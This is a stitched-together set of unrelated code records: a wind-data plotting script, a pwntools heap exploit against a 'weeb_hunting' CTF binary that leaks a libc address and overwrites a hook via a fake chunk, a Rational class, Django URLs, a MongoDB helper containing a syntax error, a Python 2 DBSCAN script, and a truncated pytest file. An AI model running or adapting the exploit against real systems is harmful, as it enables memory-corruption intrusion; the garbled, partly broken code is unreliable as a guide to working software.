"step-3": "<mask token>\nmatplotlib.style.use('ggplot')\n<mask token>\nsys.path.append('masterThesisPack/')\n<mask token>\nBASE_DIR = oceano.make_dir()\nDATA_DIR = BASE_DIR.replace('github/', 'ventopcse/data/')\nSAVE_DIR = BASE_DIR + 'dissertacao/presentation/figures/'\nraw = xr.open_dataset(DATA_DIR + 'Est_lajeSantos/lajesantos.nc')\nraw = raw.to_dataframe()\ndata = raw.copy()\ntreat = data.copy()\ntreat[treat > 3 * treat.std()] = np.nan\nstd = treat.wind_along.std()\nfig, ax = plt.subplots()\nraw.wind_along.plot(ax=ax)\nax.axhline(y=3 * std, c='k', ls='dashed')\nax.axhline(y=-3 * std, c='k', ls='dashed')\nax.set_ylabel('Vento a 10m de altura [m.s$^{-1}$]')\n",
"step-4": "import glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport pandas as pd\nimport os\nimport pickle\nfrom scipy.interpolate import griddata\nfrom mpl_toolkits.basemap import Basemap\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom matplotlib import dates\nimport datetime\nimport matplotlib\nmatplotlib.style.use('ggplot')\nimport sys\nsys.path.append('masterThesisPack/')\nimport masterThesisPack as oceano\nBASE_DIR = oceano.make_dir()\nDATA_DIR = BASE_DIR.replace('github/', 'ventopcse/data/')\nSAVE_DIR = BASE_DIR + 'dissertacao/presentation/figures/'\nraw = xr.open_dataset(DATA_DIR + 'Est_lajeSantos/lajesantos.nc')\nraw = raw.to_dataframe()\ndata = raw.copy()\ntreat = data.copy()\ntreat[treat > 3 * treat.std()] = np.nan\nstd = treat.wind_along.std()\nfig, ax = plt.subplots()\nraw.wind_along.plot(ax=ax)\nax.axhline(y=3 * std, c='k', ls='dashed')\nax.axhline(y=-3 * std, c='k', ls='dashed')\nax.set_ylabel('Vento a 10m de altura [m.s$^{-1}$]')\n",
"step-5": "# add some description here\n\nimport glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport pandas as pd\nimport os\nimport pickle\nfrom scipy.interpolate import griddata\nfrom mpl_toolkits.basemap import Basemap\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom matplotlib import dates\nimport datetime\n\nimport matplotlib\nmatplotlib.style.use('ggplot')\n\nimport sys\nsys.path.append('masterThesisPack/')\n\nimport masterThesisPack as oceano\n\nBASE_DIR = oceano.make_dir()\nDATA_DIR = BASE_DIR.replace('github/', 'ventopcse/data/')\nSAVE_DIR = BASE_DIR + 'dissertacao/presentation/figures/'\n\n# importing laje de santos data\nraw = xr.open_dataset(DATA_DIR+'Est_lajeSantos/lajesantos.nc')\nraw = raw.to_dataframe()\n\n# cut only a period\n# raw = raw['2015-04':]\ndata = raw.copy()\ntreat = data.copy()\ntreat[treat > 3*treat.std()] = np.nan\n\nstd = treat.wind_along.std()\n\nfig,ax = plt.subplots()\n\nraw.wind_along.plot(ax=ax)\nax.axhline(y=3*std,c='k',ls='dashed')\nax.axhline(y=-3*std,c='k',ls='dashed')\nax.set_ylabel(r'Vento a 10m de altura [m.s$^{-1}$]')\n\n\n# plt.savefig(SAVE_DIR.replace('github','gitlab') + 'qualityControl.png',dpi=250)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from pwn import *
p = process("./weeb_hunting")
elf = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
pwnlib.gdb.attach(p)
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("AAAA\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("AAAA\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("\n")
p.send("\n")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("1")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("4")
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('\x41\x22\x60')
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while "You found a sword" not in r:
p.send("\n")
r = p.recv()
p.sendline("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
__srandom = u64((r.split("1. ")[1].split("\n")[0] + "\x00"*8)[:8])
log.info(hex(__srandom))
hook = __srandom + 0x38A21D
log.info("Fake chunk: " + hex(hook))
p.sendline("2")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("3")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("4")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("3")
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
|
normal
|
{
"blob_id": "5eb4c71869b077dac0d61072c99d801030395fc2",
"index": 636,
"step-1": "<mask token>\n",
"step-2": "<mask token>\npwnlib.gdb.attach(p)\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('\\n')\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('\\n')\np.send('\\n')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('1')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('A\"`')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\n<mask token>\nwhile 'You found a sword' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\n<mask token>\nlog.info(hex(__srandom))\n<mask token>\nlog.info('Fake chunk: ' + hex(hook))\np.sendline('2')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline(p64(hook)[:6])\np.interactive()\n",
"step-3": "<mask token>\np = process('./weeb_hunting')\nelf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')\npwnlib.gdb.attach(p)\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('\\n')\np.send('\\n')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('1')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('A\"`')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a sword' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\n__srandom = u64((r.split('1. ')[1].split('\\n')[0] + '\\x00' * 8)[:8])\nlog.info(hex(__srandom))\nhook = __srandom + 3711517\nlog.info('Fake chunk: ' + hex(hook))\np.sendline('2')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline(p64(hook)[:6])\np.interactive()\n",
"step-4": "from pwn import *\np = process('./weeb_hunting')\nelf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')\npwnlib.gdb.attach(p)\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('\\n')\np.send('\\n')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('1')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('A\"`')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a sword' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\n__srandom = u64((r.split('1. ')[1].split('\\n')[0] + '\\x00' * 8)[:8])\nlog.info(hex(__srandom))\nhook = __srandom + 3711517\nlog.info('Fake chunk: ' + hex(hook))\np.sendline('2')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline(p64(hook)[:6])\np.interactive()\n",
"step-5": "from pwn import *\n\np = process(\"./weeb_hunting\")\n\nelf = ELF(\"/lib/x86_64-linux-gnu/libc-2.23.so\")\n\npwnlib.gdb.attach(p)\n\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"AAAA\\n\")\np.send(\"AAAA\\n\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"AAAA\\n\")\np.send(\"AAAA\\n\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"AAAA\\n\")\np.send(\"\\n\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"\\n\")\np.send(\"\\n\")\nr = p.recv()\n\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"1\")\n\nr = p.recv()\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"4\")\n\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline('\\x41\\x22\\x60')\n\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline('AAAA')\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline('AAAA')\n\nr = p.recv()\nwhile \"You found a sword\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `\")\n\nr = p.recv()\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\n__srandom = u64((r.split(\"1. \")[1].split(\"\\n\")[0] + \"\\x00\"*8)[:8])\nlog.info(hex(__srandom))\n\nhook = __srandom + 0x38A21D\n\nlog.info(\"Fake chunk: \" + hex(hook))\n\np.sendline(\"2\")\nr = p.recv()\n\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"3\")\nr = p.recv()\n\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"4\")\nr = p.recv()\n\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"3\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(p64(hook)[:6])\n\np.interactive()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# using python3
class Rational:
def __init__(self, numer, denom):
self.numer = numer
self.denom = denom
def __add__(self, other):
return Rational(
self.numer * other.denom + other.numer * self.denom,
self.denom * other.denom
)
def __sub__(self, other):
return Rational(
self.numer * other.denom - other.numer * self.denom,
self.denom * other.denom
)
def __mul__(self, other):
return Rational(
self.numer * other.numer,
self.denom * other.denom
)
def __truediv__(self, other):
return Rational(
self.numer * other.denom,
self.denom * other.numer
)
def __str__(self):
return "{numer}/{denom}".format(
numer=self.numer, denom=self.denom
)
def __repr__(self):
return "Rational({numer}/{denom})".format(
numer=self.numer, denom=self.denom
)
|
normal
|
{
"blob_id": "8098b9c27689dd4168ef05c03d4ec00f67f8090e",
"index": 4771,
"step-1": "class Rational:\n\n def __init__(self, numer, denom):\n self.numer = numer\n self.denom = denom\n <mask token>\n <mask token>\n\n def __mul__(self, other):\n return Rational(self.numer * other.numer, self.denom * other.denom)\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "class Rational:\n\n def __init__(self, numer, denom):\n self.numer = numer\n self.denom = denom\n <mask token>\n\n def __sub__(self, other):\n return Rational(self.numer * other.denom - other.numer * self.denom,\n self.denom * other.denom)\n\n def __mul__(self, other):\n return Rational(self.numer * other.numer, self.denom * other.denom)\n\n def __truediv__(self, other):\n return Rational(self.numer * other.denom, self.denom * other.numer)\n <mask token>\n\n def __repr__(self):\n return 'Rational({numer}/{denom})'.format(numer=self.numer, denom=\n self.denom)\n",
"step-3": "class Rational:\n\n def __init__(self, numer, denom):\n self.numer = numer\n self.denom = denom\n <mask token>\n\n def __sub__(self, other):\n return Rational(self.numer * other.denom - other.numer * self.denom,\n self.denom * other.denom)\n\n def __mul__(self, other):\n return Rational(self.numer * other.numer, self.denom * other.denom)\n\n def __truediv__(self, other):\n return Rational(self.numer * other.denom, self.denom * other.numer)\n\n def __str__(self):\n return '{numer}/{denom}'.format(numer=self.numer, denom=self.denom)\n\n def __repr__(self):\n return 'Rational({numer}/{denom})'.format(numer=self.numer, denom=\n self.denom)\n",
"step-4": "class Rational:\n\n def __init__(self, numer, denom):\n self.numer = numer\n self.denom = denom\n\n def __add__(self, other):\n return Rational(self.numer * other.denom + other.numer * self.denom,\n self.denom * other.denom)\n\n def __sub__(self, other):\n return Rational(self.numer * other.denom - other.numer * self.denom,\n self.denom * other.denom)\n\n def __mul__(self, other):\n return Rational(self.numer * other.numer, self.denom * other.denom)\n\n def __truediv__(self, other):\n return Rational(self.numer * other.denom, self.denom * other.numer)\n\n def __str__(self):\n return '{numer}/{denom}'.format(numer=self.numer, denom=self.denom)\n\n def __repr__(self):\n return 'Rational({numer}/{denom})'.format(numer=self.numer, denom=\n self.denom)\n",
"step-5": "# using python3\n\n\nclass Rational:\n def __init__(self, numer, denom):\n self.numer = numer\n self.denom = denom\n\n def __add__(self, other):\n return Rational(\n self.numer * other.denom + other.numer * self.denom,\n self.denom * other.denom\n )\n\n def __sub__(self, other):\n return Rational(\n self.numer * other.denom - other.numer * self.denom,\n self.denom * other.denom\n )\n\n def __mul__(self, other):\n return Rational(\n self.numer * other.numer,\n self.denom * other.denom\n )\n\n def __truediv__(self, other):\n return Rational(\n self.numer * other.denom,\n self.denom * other.numer\n )\n\n def __str__(self):\n return \"{numer}/{denom}\".format(\n numer=self.numer, denom=self.denom\n )\n\n def __repr__(self):\n return \"Rational({numer}/{denom})\".format(\n numer=self.numer, denom=self.denom\n )\n\n",
"step-ids": [
3,
6,
7,
8,
9
]
}
|
[
3,
6,
7,
8,
9
] |
from django.contrib import admin
from django.urls import path
from . import view
urlpatterns = [
path('', view.enterMarks),
path('MarkSheet', view.getMarks, name='MarkSheet'),
]
|
normal
|
{
"blob_id": "511c555c88fb646b7b87678044b43a5a623a5ac7",
"index": 4670,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('', view.enterMarks), path('MarkSheet', view.getMarks,\n name='MarkSheet')]\n",
"step-3": "from django.contrib import admin\nfrom django.urls import path\nfrom . import view\nurlpatterns = [path('', view.enterMarks), path('MarkSheet', view.getMarks,\n name='MarkSheet')]\n",
"step-4": "\nfrom django.contrib import admin\nfrom django.urls import path\nfrom . import view\n\nurlpatterns = [\n path('', view.enterMarks),\n path('MarkSheet', view.getMarks, name='MarkSheet'),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
learningRateBase = 0.001
learningRateDecreaseStep = 80
epochNum = 100
generateNum = 3
batchSize = 16
trainPoems = "./data/poems.txt"
checkpointsPath = "./model/"
|
normal
|
{
"blob_id": "2fb299f5454c251dc1c77c2597ee23bf414c716e",
"index": 4845,
"step-1": "<mask token>\n",
"step-2": "learningRateBase = 0.001\nlearningRateDecreaseStep = 80\nepochNum = 100\ngenerateNum = 3\nbatchSize = 16\ntrainPoems = './data/poems.txt'\ncheckpointsPath = './model/'\n",
"step-3": "learningRateBase = 0.001\nlearningRateDecreaseStep = 80\nepochNum = 100\ngenerateNum = 3\nbatchSize = 16\n\ntrainPoems = \"./data/poems.txt\"\ncheckpointsPath = \"./model/\"",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import mysql.connector
import hashlib
import time
from datetime import datetime
from datetime import timedelta
from pymongo import MongoClient
from pymongo import IndexModel, ASCENDING, DESCENDING
class MongoManager:
def __init__(self, server_ip='localhost', client=None, expires=timedelta(days=30)):
"""
client: mongo database client
expires: timedelta of amount of time before a cache entry is considered expired
"""
# if a client object is not passed
# then try connecting to mongodb at the default localhost port
self.client = MongoClient(server_ip, 27017) if client is None else client
#create collection to store cached webpages,
# which is the equivalent of a table in a relational database
self.db = self.client.spider
# create index if db is empty
if self.db.locations.count() is 0:
self.db.mfw.create_index([("url", ASCENDING)])
def query_by_url(self, url):
records = self.db.mfw.find({'url':url})
if records:
return records
else:
return None
def insert_page(self, url, html):
self.db.mfw.insert(
'url': url,
'html':html
)
def clear(self):
self.db.mfw.drop()
if __name__ == '__main__':
mongo_mgr = MongoManager()
|
normal
|
{
"blob_id": "4cb5dcf0d943ef15421bb6bced65804533d232e3",
"index": 4950,
"step-1": "import mysql.connector\nimport hashlib\nimport time \nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom pymongo import MongoClient\nfrom pymongo import IndexModel, ASCENDING, DESCENDING\n\n\nclass MongoManager:\n\n def __init__(self, server_ip='localhost', client=None, expires=timedelta(days=30)):\n \"\"\"\n client: mongo database client\n expires: timedelta of amount of time before a cache entry is considered expired\n \"\"\"\n # if a client object is not passed \n # then try connecting to mongodb at the default localhost port \n self.client = MongoClient(server_ip, 27017) if client is None else client\n #create collection to store cached webpages,\n # which is the equivalent of a table in a relational database\n self.db = self.client.spider\n\n # create index if db is empty\n if self.db.locations.count() is 0:\n self.db.mfw.create_index([(\"url\", ASCENDING)])\n\n def query_by_url(self, url):\n records = self.db.mfw.find({'url':url})\n\n if records:\n return records\n else:\n return None\n\n def insert_page(self, url, html):\n self.db.mfw.insert(\n 'url': url,\n 'html':html\n )\n\n def clear(self):\n self.db.mfw.drop()\n\nif __name__ == '__main__':\n mongo_mgr = MongoManager()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/bin/usr/python
'''
Author: SaiKumar Immadi
Basic DBSCAN clustering algorithm written in python
5th Semester @ IIIT Guwahati
'''
# You can use this code for free. Just don't plagiarise it for your lab assignments
import sys
from math import sqrt
from random import randint
import matplotlib.pyplot as plt
def main(argv):
global e,mainList,minPts,clusters,outliers
mainList=[]
clusters=[]
outliers=[]
if(len(argv)!=3):
print "The Format is <dbscan.py minPts e data.txt>"
return 0
minPts=int(argv[0])
e=float(argv[1])
if(minPts<2 or e<=0):
print "minPts should be greater than or equal to 2"
print "e should be greater than 0"
return 0
filename=argv[2]
file=open(filename,"r")
for line in file:
lineStripped=line.strip().split('\t')
mainList.append((float(lineStripped[0]),float(lineStripped[1])))
file.close()
while(len(mainList)>0):
point=mainList.pop(0)
mainEneigh=calcEneigh(point,1,[])
outEneigh=calcEneigh(point,2,[])
if(len(mainEneigh+outEneigh)>=minPts):
cluster=calcCluster(point)
clusters.append(cluster)
else:
outliers.append(point)
fig=plt.figure()
cluster_count=0
for cluster in clusters:
cluster_count+=1
x_coordinates=[]
y_coordinates=[]
for point in cluster:
x_coordinates.append(point[0])
y_coordinates.append(point[1])
label_name="Cluster : %.d" % (cluster_count)
plt.scatter(x_coordinates,y_coordinates,s=5,label=label_name)
x_out_coordinates=[]
y_out_coordinates=[]
for outlier in outliers:
x_out_coordinates.append(outlier[0])
y_out_coordinates.append(outlier[1])
plt.scatter(x_out_coordinates,y_out_coordinates,s=5,label='outliers')
plt.title('DBSCAN Clustering')
plt.xlabel('x-axis')
plt.ylabel('y-axis')
plt.legend()
fig.savefig('output.jpg')
print len(clusters),"clusters"
plt.show()
return 0
def calcEneigh(p,opt,optList):
global e,mainList,minPts,clusters,outliers
if(opt==1):
list=mainList
elif(opt==2):
list=outliers
elif(opt==3):
list=optList
eneigh=[]
for point in list:
x1=p[0]
y1=p[1]
x2=point[0]
y2=point[1]
dist = sqrt((x2 - x1)**2 + (y2 - y1)**2)
if(dist<=e):
eneigh.append(point)
return eneigh
def calcCluster(p):
global e,mainList,minPts,clusters,outliers
cluster=[]
tempList=[]
tempList.append(p)
while(len(tempList)>0):
point=tempList.pop(0)
mainEneigh=calcEneigh(point,1,[])
outEneigh=calcEneigh(point,2,[])
clusterEneigh=calcEneigh(point,3,cluster+tempList)
cluster.append(point)
for x in mainEneigh:
mainList.remove(x)
for x in outEneigh:
outliers.remove(x)
if(len(mainEneigh+outEneigh+clusterEneigh)>=minPts):
tempList=tempList+mainEneigh+outEneigh
else:
cluster=cluster+mainEneigh+outEneigh
return cluster
if __name__ == "__main__":
main(sys.argv[1:])
|
normal
|
{
"blob_id": "624ecf743d5be1acc33df14bd721b3103d232f0e",
"index": 2444,
"step-1": "#!/bin/usr/python\n'''\nAuthor: SaiKumar Immadi\nBasic DBSCAN clustering algorithm written in python\n5th Semester @ IIIT Guwahati\n'''\n\n# You can use this code for free. Just don't plagiarise it for your lab assignments\n\nimport sys\nfrom math import sqrt\nfrom random import randint\nimport matplotlib.pyplot as plt\n\ndef main(argv):\n global e,mainList,minPts,clusters,outliers\n mainList=[]\n clusters=[]\n outliers=[]\n if(len(argv)!=3):\n print \"The Format is <dbscan.py minPts e data.txt>\"\n return 0\n minPts=int(argv[0])\n e=float(argv[1])\n if(minPts<2 or e<=0):\n print \"minPts should be greater than or equal to 2\"\n print \"e should be greater than 0\"\n return 0\n filename=argv[2]\n file=open(filename,\"r\")\n for line in file:\n lineStripped=line.strip().split('\\t')\n mainList.append((float(lineStripped[0]),float(lineStripped[1])))\n file.close()\n while(len(mainList)>0):\n point=mainList.pop(0)\n mainEneigh=calcEneigh(point,1,[])\n outEneigh=calcEneigh(point,2,[])\n if(len(mainEneigh+outEneigh)>=minPts):\n cluster=calcCluster(point)\n clusters.append(cluster)\n else:\n outliers.append(point)\n fig=plt.figure()\n cluster_count=0\n for cluster in clusters:\n cluster_count+=1\n x_coordinates=[]\n y_coordinates=[]\n for point in cluster:\n x_coordinates.append(point[0])\n y_coordinates.append(point[1])\n label_name=\"Cluster : %.d\" % (cluster_count)\n plt.scatter(x_coordinates,y_coordinates,s=5,label=label_name)\n x_out_coordinates=[]\n y_out_coordinates=[]\n for outlier in outliers:\n x_out_coordinates.append(outlier[0])\n y_out_coordinates.append(outlier[1])\n plt.scatter(x_out_coordinates,y_out_coordinates,s=5,label='outliers')\n plt.title('DBSCAN Clustering')\n plt.xlabel('x-axis')\n plt.ylabel('y-axis')\n plt.legend()\n fig.savefig('output.jpg')\n print len(clusters),\"clusters\"\n plt.show()\n return 0\n\ndef calcEneigh(p,opt,optList):\n global e,mainList,minPts,clusters,outliers\n if(opt==1):\n list=mainList\n elif(opt==2):\n list=outliers\n elif(opt==3):\n \tlist=optList\n eneigh=[]\n for point in list:\n x1=p[0]\n y1=p[1]\n x2=point[0]\n y2=point[1]\n dist = sqrt((x2 - x1)**2 + (y2 - y1)**2)\n if(dist<=e):\n eneigh.append(point)\n return eneigh\n\ndef calcCluster(p):\n global e,mainList,minPts,clusters,outliers\n cluster=[]\n tempList=[]\n tempList.append(p)\n while(len(tempList)>0):\n point=tempList.pop(0)\n mainEneigh=calcEneigh(point,1,[])\n outEneigh=calcEneigh(point,2,[])\n clusterEneigh=calcEneigh(point,3,cluster+tempList)\n cluster.append(point)\n for x in mainEneigh:\n mainList.remove(x)\n for x in outEneigh:\n outliers.remove(x)\n if(len(mainEneigh+outEneigh+clusterEneigh)>=minPts):\n tempList=tempList+mainEneigh+outEneigh\n else:\n cluster=cluster+mainEneigh+outEneigh\n return cluster\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import os
import inspect
import pytest
from ._common import copy_default_profile_collection, patch_first_startup_file
from bluesky_queueserver.manager.profile_tools import global_user_namespace, load_devices_from_happi
from bluesky_queueserver.manager.profile_ops import load_profile_collection
def create_local_imports_files(tmp_path):
path_dir = os.path.join(tmp_path, "dir_local_imports")
fln_func = os.path.join(path_dir, "file_func.py")
fln_gen = os.path.join(path_dir, "file_gen.py")
os.makedirs(path_dir, exist_ok=True)
# Create file1
code1 = """
from bluesky_queueserver.manager.profile_tools import set_user_ns
# Function that has the parameter 'ipython'
@set_user_ns
def f1(some_value, user_ns, ipython):
user_ns["func_was_called"] = "func_was_called"
return (some_value, user_ns["v_from_namespace"], bool(ipython))
# Function that has no parameter 'ipython'
@set_user_ns
def f1a(some_value, user_ns):
user_ns["func_A_was_called"] = "func_was_called"
return (some_value, user_ns["v_from_namespace"])
"""
with open(fln_func, "w") as f:
f.writelines(code1)
# Create file2
code2 = """
from bluesky_queueserver.manager.profile_tools import set_user_ns
# Function that has the parameter 'ipython'
@set_user_ns
def f2(some_value, user_ns, ipython):
user_ns["gen_was_called"] = "gen_was_called"
yield (some_value, user_ns["v_from_namespace"], bool(ipython))
# Function that has no parameter 'ipython'
@set_user_ns
def f2a(some_value, user_ns):
user_ns["gen_A_was_called"] = "gen_was_called"
yield (some_value, user_ns["v_from_namespace"])
@set_user_ns
def f3(some_value, user_ns, ipython):
user_ns["value_f3"] = some_value
f3(91)
"""
with open(fln_gen, "w") as f:
f.writelines(code2)
patch_code = """
from dir_local_imports.file_func import f1, f1a
from dir_local_imports.file_gen import f2, f2a
from bluesky_queueserver.manager.profile_tools import set_user_ns
@set_user_ns
def f4(some_value, user_ns, ipython):
user_ns["value_f4"] = some_value
f4(90)
"""
def test_set_user_ns_1(tmp_path):
"""
Tests for ``set_user_ns`` decorator. The functionality of the decorator
is fully tested (only without IPython):
- using ``global_user_namespace`` to pass values in and out of the function
defined in the imported module (emulation of ``get_ipython().user_ns``).
- checking if the function is executed from IPython (only for the function
defined in the imported module).
"""
pc_path = copy_default_profile_collection(tmp_path)
create_local_imports_files(pc_path)
patch_first_startup_file(pc_path, patch_code)
nspace = load_profile_collection(pc_path)
assert len(nspace) > 0, "Failed to load the profile collection"
assert "f1" in nspace, "Test for local imports failed"
assert "f2" in nspace, "Test for local imports failed"
# Test if the decorator `set_user_ns` does not change function type
assert inspect.isgeneratorfunction(nspace["f1"]) is False
assert inspect.isgeneratorfunction(nspace["f2"]) is True
# Check if the extra arguments are removed from the function signature
def check_signature(func):
params = inspect.signature(func).parameters
assert "user_ns" not in params
